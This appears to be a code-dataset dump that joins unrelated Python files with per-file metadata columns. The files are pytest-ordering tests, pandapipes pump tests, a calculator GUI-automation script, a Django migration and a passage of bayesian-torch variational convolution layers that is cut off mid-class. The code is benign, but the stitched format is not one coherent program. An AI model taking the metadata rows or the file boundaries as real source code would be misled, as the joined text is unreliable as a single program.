assert item_names_for(tests_content) == ['test_4', 'test_5', 'test_3', 'test_1', 'test_2']
def test_order_mark_class(item_names_for):
tests_content = """
import pytest
@pytest.mark.run(order=-1)
class TestLast(object):
def test_1(self): pass
def test_2(self): pass
@pytest.mark.run(order=0)
def test_3(): pass
@pytest.mark.run(order=-2)
class TestFirst(object):
def test_4(self): pass
def test_5(self): pass
"""
assert item_names_for(tests_content) == ['test_3', 'test_4', 'test_5', 'test_1', 'test_2']
def test_markers_registered(capsys):
pytest.main(['--markers'])
out, err = capsys.readouterr()
assert '@pytest.mark.run' in out
assert '@pytest.mark.first' in out
assert '@pytest.mark.last' in out
assert out.count('Provided by pytest-ordering') == 17
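# Hypothetical end-user module showing the three marker styles verified above
# (the test names are ours, for illustration only):
#
#     import pytest
#
#     @pytest.mark.last
#     def test_teardown_checks(): pass
#
#     @pytest.mark.run(order=2)
#     def test_second(): pass
#
#     @pytest.mark.run(order=1)
#     def test_first(): pass
#
#     @pytest.mark.first
#     def test_setup_checks(): pass
#
# Collection order becomes: test_setup_checks, test_first, test_second,
# test_teardown_checks.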
| 19.507194
| 114
| 0.627881
| 790
| 5,423
| 4.025316
| 0.097468
| 0.134277
| 0.109434
| 0.14434
| 0.816981
| 0.763836
| 0.740881
| 0.727673
| 0.615723
| 0.612893
| 0
| 0.031662
| 0.231237
| 5,423
| 277
| 115
| 19.577617
| 0.731111
| 0.011617
| 0
| 0.761905
| 0
| 0
| 0.557588
| 0.115736
| 0
| 0
| 0
| 0
| 0.10119
| 1
| 0.095238
| false
| 0.279762
| 0.083333
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
22e8211fdccf137fcf923e1a1de21f874d941cd6
| 7,840
|
py
|
Python
|
pandapipes/test/api/test_components/test_pump.py
|
nsanina/pandapipes
|
b2daaca6b83e7d8934502796721846bd9d552364
|
[
"BSD-3-Clause"
] | null | null | null |
pandapipes/test/api/test_components/test_pump.py
|
nsanina/pandapipes
|
b2daaca6b83e7d8934502796721846bd9d552364
|
[
"BSD-3-Clause"
] | null | null | null |
pandapipes/test/api/test_components/test_pump.py
|
nsanina/pandapipes
|
b2daaca6b83e7d8934502796721846bd9d552364
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright (c) 2020 by Fraunhofer Institute for Energy Economics
# and Energy System Technology (IEE), Kassel. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be found in the LICENSE file.
import pandapipes
import os
import pytest
import numpy as np
import pandas as pd
from pandapipes.test.pipeflow_internals import internals_data_path
def test_pump_from_measurement_parameters():
    """
    Pump characteristic defined by measured (flow, pressure-lift) points.
    """
net = pandapipes.create_empty_network("net", add_stdtypes=False)
j1 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j2 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j3 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j4 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
pandapipes.create_pipe_from_parameters(net, j1, j2, k_mm=1., length_km=0.43380,
diameter_m=0.1022)
pandapipes.create_pipe_from_parameters(net, j3, j4, k_mm=1., length_km=0.26370,
diameter_m=0.1022)
pandapipes.create_ext_grid(net, j1, 5, 283.15, type="p")
pandapipes.create_pump_from_parameters(net, j2, j3, 'P1', [6.1, 5.8, 4], [0, 19, 83], 2)
pandapipes.create_sink(net, j4, 0.02333)
pandapipes.create_fluid_from_lib(net, "lgas", overwrite=True)
pandapipes.pipeflow(net, stop_condition="tol", iter=3, friction_model="nikuradse",
mode="hydraulics", transient=False, nonlinear_method="automatic",
tol_p=1e-4,
tol_v=1e-4)
data = pd.read_csv(os.path.join(internals_data_path, "test_pump.csv"), sep=';')
res_junction = net.res_junction.p_bar.values
res_pipe = net.res_pipe.v_mean_m_per_s.values
p_diff = np.abs(1 - res_junction / data['p'].dropna().values)
v_diff = np.abs(1 - res_pipe / data['v'].dropna().values)
assert np.all(p_diff < 0.01)
assert np.all(v_diff < 0.01)
def test_pump_from_regression_parameters():
    """
    Pump characteristic defined by polynomial regression coefficients.
    """
net = pandapipes.create_empty_network("net", add_stdtypes=False)
j1 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j2 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j3 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j4 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
pandapipes.create_pipe_from_parameters(net, j1, j2, k_mm=1., length_km=0.43380,
diameter_m=0.1022)
pandapipes.create_pipe_from_parameters(net, j3, j4, k_mm=1., length_km=0.26370,
diameter_m=0.1022)
pandapipes.create_ext_grid(net, j1, 5, 283.15, type="p")
pandapipes.create_pump_from_parameters(net, j2, j3, 'P1',
poly_coefficents=[-1.48620799e-04, -1.29656785e-02,
6.10000000e+00])
pandapipes.create_sink(net, j4, 0.02333)
pandapipes.create_fluid_from_lib(net, "lgas", overwrite=True)
pandapipes.pipeflow(net, stop_condition="tol", iter=3, friction_model="nikuradse",
mode="hydraulics", transient=False, nonlinear_method="automatic",
tol_p=1e-4,
tol_v=1e-4)
data = pd.read_csv(os.path.join(internals_data_path, "test_pump.csv"), sep=';')
res_junction = net.res_junction.p_bar.values
res_pipe = net.res_pipe.v_mean_m_per_s.values
p_diff = np.abs(1 - res_junction / data['p'].dropna().values)
v_diff = np.abs(1 - res_pipe / data['v'].dropna().values)
assert np.all(p_diff < 0.01)
assert np.all(v_diff < 0.01)
def test_pump_from_std_type():
"""
:return:
:rtype:
"""
net = pandapipes.create_empty_network("net", add_stdtypes=True)
j1 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j2 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j3 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j4 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
pandapipes.create_pipe(net, j1, j2, std_type='125_PE_80_SDR_11', k_mm=1., length_km=0.43380)
pandapipes.create_pipe(net, j3, j4, std_type='125_PE_80_SDR_11', k_mm=1., length_km=0.26370)
pandapipes.create_ext_grid(net, j1, 5, 283.15, type="p")
pandapipes.create_pump(net, j2, j3, std_type='P1')
pandapipes.create_sink(net, j4, 0.02333)
pandapipes.create_fluid_from_lib(net, "lgas", overwrite=True)
pandapipes.pipeflow(net, stop_condition="tol", iter=3, friction_model="nikuradse",
mode="hydraulics", transient=False, nonlinear_method="automatic",
tol_p=1e-4,
tol_v=1e-4)
data = pd.read_csv(os.path.join(internals_data_path, "test_pump.csv"), sep=';')
res_junction = net.res_junction.p_bar.values
res_pipe = net.res_pipe.v_mean_m_per_s.values
p_diff = np.abs(1 - res_junction / data['p'].dropna().values)
v_diff = np.abs(1 - res_pipe / data['v'].dropna().values)
assert np.all(p_diff < 0.01)
assert np.all(v_diff < 0.01)
def test_pump_bypass_on_reverse_flow():
"""
reverse flow = no pressure lift
:return:
:rtype:
"""
net = pandapipes.create_empty_network("net", add_stdtypes=True)
j1 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j2 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j3 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j4 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
pandapipes.create_pipe(net, j1, j2, std_type='125_PE_80_SDR_11', k_mm=1., length_km=10)
pandapipes.create_pipe(net, j3, j4, std_type='125_PE_80_SDR_11', k_mm=1., length_km=12)
pandapipes.create_ext_grid(net, j1, 5, 283.15, type="p")
pandapipes.create_pump(net, j2, j3, std_type='P1')
pandapipes.create_source(net, j4, 0.02333)
pandapipes.create_fluid_from_lib(net, "hgas", overwrite=True)
pandapipes.pipeflow(net, stop_condition="tol", iter=3, friction_model="nikuradse",
mode="hydraulics", transient=False, nonlinear_method="automatic",
tol_p=1e-4, tol_v=1e-4)
assert net.res_pump.deltap_bar.isin([0]).all()
assert np.isclose(net.res_junction.loc[1, "p_bar"], net.res_junction.loc[2, "p_bar"])
def test_pump_bypass_high_vdot():
"""
High flow: pressure lift not <0, always >=0
:return:
:rtype:
"""
net = pandapipes.create_empty_network("net", add_stdtypes=True)
j1 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j2 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j3 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
j4 = pandapipes.create_junction(net, pn_bar=5, tfluid_k=283.15)
pandapipes.create_pipe(net, j1, j2, std_type='2000_ST<16', k_mm=0.1, length_km=0.1)
pandapipes.create_pipe(net, j3, j4, std_type='2000_ST<16', k_mm=0.1, length_km=0.1)
pandapipes.create_ext_grid(net, j1, 5, 283.15, type="p")
pandapipes.create_pump(net, j2, j3, std_type='P1')
pandapipes.create_sink(net, j4, 1000)
pandapipes.create_fluid_from_lib(net, "hgas", overwrite=True)
pandapipes.pipeflow(net, stop_condition="tol", iter=30, friction_model="nikuradse",
mode="hydraulics", transient=False, nonlinear_method="automatic",
tol_p=1e-4, tol_v=1e-4)
assert net.res_pump.deltap_bar.isin([0]).all()
assert np.isclose(net.res_junction.loc[1, "p_bar"], net.res_junction.loc[2, "p_bar"])
if __name__ == '__main__':
n = pytest.main(["test_pump.py"])
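# The first three pipeflow tests above repeat one CSV comparison; a hedged
# refactor sketch (helper name and rtol parameter are ours, not pandapipes'):
#
#     def assert_matches_reference(net, csv_name="test_pump.csv", rtol=0.01):
#         data = pd.read_csv(os.path.join(internals_data_path, csv_name), sep=';')
#         p_diff = np.abs(1 - net.res_junction.p_bar.values / data['p'].dropna().values)
#         v_diff = np.abs(1 - net.res_pipe.v_mean_m_per_s.values / data['v'].dropna().values)
#         assert np.all(p_diff < rtol)
#         assert np.all(v_diff < rtol)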
| 41.481481
| 99
| 0.654719
| 1,189
| 7,840
| 4.055509
| 0.149706
| 0.182497
| 0.099544
| 0.111987
| 0.88428
| 0.88428
| 0.88428
| 0.882207
| 0.879925
| 0.879925
| 0
| 0.075218
| 0.21148
| 7,840
| 189
| 100
| 41.481481
| 0.704788
| 0.052806
| 0
| 0.777778
| 0
| 0
| 0.05175
| 0
| 0
| 0
| 0
| 0
| 0.08547
| 1
| 0.042735
| false
| 0.017094
| 0.051282
| 0
| 0.094017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a3bf29fdadd5bf1182a1728a80e70b5f6f09bc4d
| 2,783
|
py
|
Python
|
test/gui_test/calculator/calculator.py
|
JE-Chen/AutoControl
|
c2d78f0b428d27aef2ea27f210d11c6dc1144221
|
[
"MIT"
] | 1
|
2022-03-27T14:59:45.000Z
|
2022-03-27T14:59:45.000Z
|
test/gui_test/calculator/calculator.py
|
JE-Chen/AutoControl
|
c2d78f0b428d27aef2ea27f210d11c6dc1144221
|
[
"MIT"
] | 2
|
2021-11-19T13:45:37.000Z
|
2021-12-03T12:25:28.000Z
|
test/gui_test/calculator/calculator.py
|
JE-Chen/AutoControl
|
c2d78f0b428d27aef2ea27f210d11c6dc1144221
|
[
"MIT"
] | null | null | null |
import subprocess
from time import sleep
from je_auto_control import locate_and_click
"""
開啟windows 計算機
並累加1至9
open windows calc.exe
and calculate 1 + 2 .... + 9
"""
subprocess.Popen("calc", stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True)
sleep(3)
def click(name):
    """Locate the named calculator button image and left-click it."""
    locate_and_click(
        "../../test_source/%s.png" % name,
        mouse_keycode="mouse_left",
        detect_threshold=0.9,
        draw_image=False
    )


# Button sequence: 1 + 2 =, then + 3 + 4 + 5 + 6 + 7 + 8 + 9 =
for step in ["1", "plus", "2", "equal",
             "plus", "3", "plus", "4", "plus", "5", "plus", "6",
             "plus", "7", "plus", "8", "plus", "9", "equal"]:
    click(step)
| 21.244275
| 90
| 0.682716
| 383
| 2,783
| 4.603133
| 0.127937
| 0.102099
| 0.15882
| 0.193988
| 0.875213
| 0.8616
| 0.8616
| 0.8616
| 0.8616
| 0.8616
| 0
| 0.022776
| 0.163852
| 2,783
| 130
| 91
| 21.407692
| 0.734852
| 0
| 0
| 0.716667
| 0
| 0
| 0.245283
| 0.173511
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.033333
| 0
| 0.033333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
43020e73a1bb2e3b4968dbd9aad04a2999e88bda
| 6,251
|
py
|
Python
|
whisk_tutorial/migrations/0005_auto__chg_field_tutorialuser_http_user_agent__chg_field_tutorialuser_h.py
|
apache/openwhisk-tutorial
|
f3d4e1ef8eb41462cff525df02dbbdd4998e471a
|
[
"Apache-2.0"
] | 2
|
2019-12-23T19:11:48.000Z
|
2021-11-10T15:53:41.000Z
|
whisk_tutorial/migrations/0005_auto__chg_field_tutorialuser_http_user_agent__chg_field_tutorialuser_h.py
|
tspannhw/incubator-openwhisk-tutorial
|
f3d4e1ef8eb41462cff525df02dbbdd4998e471a
|
[
"Apache-2.0"
] | 5
|
2019-08-15T15:31:21.000Z
|
2019-08-15T15:32:00.000Z
|
whisk_tutorial/migrations/0005_auto__chg_field_tutorialuser_http_user_agent__chg_field_tutorialuser_h.py
|
tspannhw/incubator-openwhisk-tutorial
|
f3d4e1ef8eb41462cff525df02dbbdd4998e471a
|
[
"Apache-2.0"
] | 2
|
2021-11-04T12:32:33.000Z
|
2021-11-10T15:53:32.000Z
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'TutorialUser.http_user_agent'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_user_agent', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_real_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_real_remote_address', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_remote_address', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_accept_language'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_accept_language', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.http_referrer'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_referrer', self.gf('django.db.models.fields.TextField')())
# Changing field 'TutorialUser.session_key'
db.alter_column(u'whisk_tutorial_tutorialuser', 'session_key', self.gf('django.db.models.fields.CharField')(unique=True, max_length=40))
# Adding unique constraint on 'TutorialUser', fields ['session_key']
db.create_unique(u'whisk_tutorial_tutorialuser', ['session_key'])
def backwards(self, orm):
# Removing unique constraint on 'TutorialUser', fields ['session_key']
db.delete_unique(u'whisk_tutorial_tutorialuser', ['session_key'])
# Changing field 'TutorialUser.http_user_agent'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_user_agent', self.gf('django.db.models.fields.CharField')(max_length=256))
# Changing field 'TutorialUser.http_real_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_real_remote_address', self.gf('django.db.models.fields.CharField')(max_length=32))
# Changing field 'TutorialUser.http_remote_address'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_remote_address', self.gf('django.db.models.fields.CharField')(max_length=32))
# Changing field 'TutorialUser.http_accept_language'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_accept_language', self.gf('django.db.models.fields.CharField')(max_length=128))
# Changing field 'TutorialUser.http_referrer'
db.alter_column(u'whisk_tutorial_tutorialuser', 'http_referrer', self.gf('django.db.models.fields.CharField')(max_length=128))
# Changing field 'TutorialUser.session_key'
db.alter_column(u'whisk_tutorial_tutorialuser', 'session_key', self.gf('django.db.models.fields.CharField')(max_length=80))
models = {
u'whisk_tutorial.whiskfileevent': {
'Meta': {'object_name': 'WhiskfileEvent'},
'errors': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'level': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['whisk_tutorial.TutorialUser']"})
},
u'whisk_tutorial.subscriber': {
'Meta': {'unique_together': "(('email', 'from_level'),)", 'object_name': 'Subscriber'},
'email': ('django.db.models.fields.EmailField', [], {'max_length': '80'}),
'from_level': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['whisk_tutorial.TutorialUser']"})
},
u'whisk_tutorial.tutorialevent': {
'Meta': {'object_name': 'TutorialEvent'},
'command': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '80', 'blank': 'True'}),
'feedback': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '2000', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['whisk_tutorial.TutorialUser']"})
},
u'whisk_tutorial.tutorialuser': {
'Meta': {'object_name': 'TutorialUser'},
'http_accept_language': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_real_remote_address': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_referrer': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_remote_address': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'http_user_agent': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '80', 'blank': 'True'}),
'session_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['whisk_tutorial']
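# Usage note (not part of the generated migration; commands assume a
# standard South-era Django project with this app installed):
#
#   python manage.py migrate whisk_tutorial        # apply forwards()
#   python manage.py migrate whisk_tutorial 0004   # roll back via backwards()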
| 63.785714
| 145
| 0.638778
| 696
| 6,251
| 5.537356
| 0.133621
| 0.083031
| 0.141671
| 0.202387
| 0.845615
| 0.840426
| 0.81863
| 0.796834
| 0.73015
| 0.687338
| 0
| 0.006715
| 0.166213
| 6,251
| 98
| 146
| 63.785714
| 0.732732
| 0.117261
| 0
| 0.15873
| 0
| 0
| 0.547338
| 0.367981
| 0
| 0
| 0
| 0
| 0
| 1
| 0.031746
| false
| 0
| 0.063492
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43114001dd68717348984363b71c1caa59b2aaaa
| 38,460
|
py
|
Python
|
bayesian_torch/layers/variational_layers/conv_variational.py
|
JunhoPark0314/bayesian-torch
|
1590cc483ae7649cd60aad2886ae95f32bea0dbe
|
[
"BSD-3-Clause"
] | 117
|
2021-01-12T11:14:09.000Z
|
2022-03-27T08:04:35.000Z
|
bayesian_torch/layers/variational_layers/conv_variational.py
|
JunhoPark0314/bayesian-torch
|
1590cc483ae7649cd60aad2886ae95f32bea0dbe
|
[
"BSD-3-Clause"
] | 12
|
2021-04-01T10:36:51.000Z
|
2021-12-16T21:51:30.000Z
|
bayesian_torch/layers/variational_layers/conv_variational.py
|
JunhoPark0314/bayesian-torch
|
1590cc483ae7649cd60aad2886ae95f32bea0dbe
|
[
"BSD-3-Clause"
] | 17
|
2021-01-13T13:16:54.000Z
|
2022-03-06T16:28:45.000Z
|
# Copyright (C) 2021 Intel Labs
#
# BSD-3-Clause License
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
#
# Convolutional layers with a reparameterization estimator to perform
# variational inference in Bayesian neural networks. Reparameterization layers
# enable Monte Carlo approximation of the distribution over 'kernel' and 'bias'.
#
# The Kullback-Leibler divergence between the surrogate posterior and the prior
# is computed and returned along with the output tensors of the convolution
# operation; both are required to compute the Evidence Lower Bound (ELBO).
#
# @authors: Ranganath Krishnan
#
# ======================================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Parameter
from ..base_variational_layer import BaseVariationalLayer_
import math
__all__ = [
'Conv1dReparameterization',
'Conv2dReparameterization',
'Conv3dReparameterization',
'ConvTranspose1dReparameterization',
'ConvTranspose2dReparameterization',
'ConvTranspose3dReparameterization',
]
class Conv1dReparameterization(BaseVariationalLayer_):
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
prior_mean=0,
prior_variance=1,
posterior_mu_init=0,
posterior_rho_init=-3.0,
bias=True):
"""
Implements Conv1d layer with reparameterization trick.
Inherits from bayesian_torch.layers.BaseVariationalLayer_
Parameters:
in_channels: int -> number of channels in the input image,
out_channels: int -> number of channels produced by the convolution,
kernel_size: int -> size of the convolving kernel,
stride: int -> stride of the convolution. Default: 1,
padding: int -> zero-padding added to both sides of the input. Default: 0,
dilation: int -> spacing between kernel elements. Default: 1,
groups: int -> number of blocked connections from input channels to output channels,
prior_mean: float -> mean of the prior arbitrary distribution to be used on the complexity cost,
prior_variance: float -> variance of the prior arbitrary distribution to be used on the complexity cost,
posterior_mu_init: float -> init trainable mu parameter representing mean of the approximate posterior,
posterior_rho_init: float -> init trainable rho parameter representing the sigma of the approximate posterior through softplus function,
bias: bool -> if set to False, the layer will not learn an additive bias. Default: True,
"""
super(Conv1dReparameterization, self).__init__()
if in_channels % groups != 0:
raise ValueError('invalid in_channels size')
if out_channels % groups != 0:
raise ValueError('invalid out_channels size')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
self.prior_mean = prior_mean
self.prior_variance = prior_variance
self.posterior_mu_init = posterior_mu_init, # mean of weight
# variance of weight --> sigma = log (1 + exp(rho))
self.posterior_rho_init = posterior_rho_init,
self.bias = bias
self.mu_kernel = Parameter(
torch.Tensor(out_channels, in_channels // groups, kernel_size))
self.rho_kernel = Parameter(
torch.Tensor(out_channels, in_channels // groups, kernel_size))
self.register_buffer(
'eps_kernel',
torch.Tensor(out_channels, in_channels // groups, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_mu',
torch.Tensor(out_channels, in_channels // groups, kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_sigma',
torch.Tensor(out_channels, in_channels // groups, kernel_size),
persistent=False)
if self.bias:
self.mu_bias = Parameter(torch.Tensor(out_channels))
self.rho_bias = Parameter(torch.Tensor(out_channels))
self.register_buffer('eps_bias', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_mu', torch.Tensor(out_channels), persistent=False)
self.register_buffer('prior_bias_sigma',
torch.Tensor(out_channels),
persistent=False)
else:
self.register_parameter('mu_bias', None)
self.register_parameter('rho_bias', None)
self.register_buffer('eps_bias', None, persistent=False)
self.register_buffer('prior_bias_mu', None, persistent=False)
self.register_buffer('prior_bias_sigma', None, persistent=False)
self.init_parameters()
def init_parameters(self):
self.prior_weight_mu.fill_(self.prior_mean)
self.prior_weight_sigma.fill_(self.prior_variance)
self.mu_kernel.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_kernel.data.normal_(mean=self.posterior_rho_init[0], std=0.1)
if self.bias:
self.prior_bias_mu.fill_(self.prior_mean)
self.prior_bias_sigma.fill_(self.prior_variance)
self.mu_bias.data.normal_(mean=self.posterior_mu_init[0], std=0.1)
self.rho_bias.data.normal_(mean=self.posterior_rho_init[0],
std=0.1)
def forward(self, input):
sigma_weight = torch.log1p(torch.exp(self.rho_kernel))
eps_kernel = self.eps_kernel.data.normal_()
weight = self.mu_kernel + (sigma_weight * eps_kernel)
kl_weight = self.kl_div(self.mu_kernel, sigma_weight,
self.prior_weight_mu, self.prior_weight_sigma)
bias = None
if self.bias:
sigma_bias = torch.log1p(torch.exp(self.rho_bias))
eps_bias = self.eps_bias.data.normal_()
bias = self.mu_bias + (sigma_bias * eps_bias)
kl_bias = self.kl_div(self.mu_bias, sigma_bias, self.prior_bias_mu,
self.prior_bias_sigma)
out = F.conv1d(input, weight, bias, self.stride, self.padding,
self.dilation, self.groups)
if self.bias:
kl = kl_weight + kl_bias
else:
kl = kl_weight
return out, kl
class Conv2dReparameterization(BaseVariationalLayer_):
def __init__(self,
in_channels,
out_channels,
kernel_size,
stride=1,
padding=0,
dilation=1,
groups=1,
prior_mean=0,
prior_variance=1,
posterior_mu_init=0,
posterior_rho_init=-3.0,
bias=True):
"""
Implements Conv2d layer with reparameterization trick.
Inherits from bayesian_torch.layers.BaseVariationalLayer_
Parameters:
in_channels: int -> number of channels in the input image,
out_channels: int -> number of channels produced by the convolution,
kernel_size: int -> size of the convolving kernel,
stride: int -> stride of the convolution. Default: 1,
padding: int -> zero-padding added to both sides of the input. Default: 0,
dilation: int -> spacing between kernel elements. Default: 1,
groups: int -> number of blocked connections from input channels to output channels,
prior_mean: float -> mean of the prior arbitrary distribution to be used on the complexity cost,
prior_variance: float -> variance of the prior arbitrary distribution to be used on the complexity cost,
posterior_mu_init: float -> init trainable mu parameter representing mean of the approximate posterior,
posterior_rho_init: float -> init trainable rho parameter representing the sigma of the approximate posterior through softplus function,
bias: bool -> if set to False, the layer will not learn an additive bias. Default: True,
"""
super(Conv2dReparameterization, self).__init__()
if in_channels % groups != 0:
raise ValueError('invalid in_channels size')
if out_channels % groups != 0:
raise ValueError('invalid out_channels size')
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = padding
self.dilation = dilation
self.groups = groups
self.prior_mean = prior_mean
self.prior_variance = prior_variance
self.posterior_mu_init = posterior_mu_init, # mean of weight
# variance of weight --> sigma = log (1 + exp(rho))
self.posterior_rho_init = posterior_rho_init,
self.bias = bias
self.mu_kernel = Parameter(
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size))
self.rho_kernel = Parameter(
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size))
self.register_buffer(
'eps_kernel',
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_mu',
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size),
persistent=False)
self.register_buffer(
'prior_weight_sigma',
torch.Tensor(out_channels, in_channels // groups, kernel_size,
kernel_size),
persistent=False)
if self.bias:
self.mu_bias = Parameter(torch.Tensor(out_channels))
self.rho_bias = Parameter(torch.Tensor(out_channels))
